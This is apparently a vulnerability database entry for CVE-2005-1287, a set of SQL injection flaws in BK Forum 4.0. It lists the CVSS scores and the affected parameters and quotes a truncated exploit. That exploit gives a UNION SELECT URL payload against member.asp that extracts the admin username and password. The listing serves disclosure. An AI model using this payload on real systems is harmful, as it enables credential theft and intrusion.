7.5
CVSSv2

CVE-2005-1287

Published: 23/04/2005 Updated: 19/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple SQL injection vulnerabilities in BK Forum 4.0 allow remote malicious users to execute arbitrary SQL commands via the (1) id parameter to member.asp, (2) forum parameter to forum.asp, or (3) various parameters in register.asp.

Vulnerable Product Search on Vulmon Subscribe to Product

bk dev bk forum

Exploits

# BK Forum <= 40 Remote SQL Injection # by n0m3rcy # Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmailorg> # Exploit: First you must be logged in Then type this in your browser wwwsitecom/path/memberasp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1 You will find admin' ...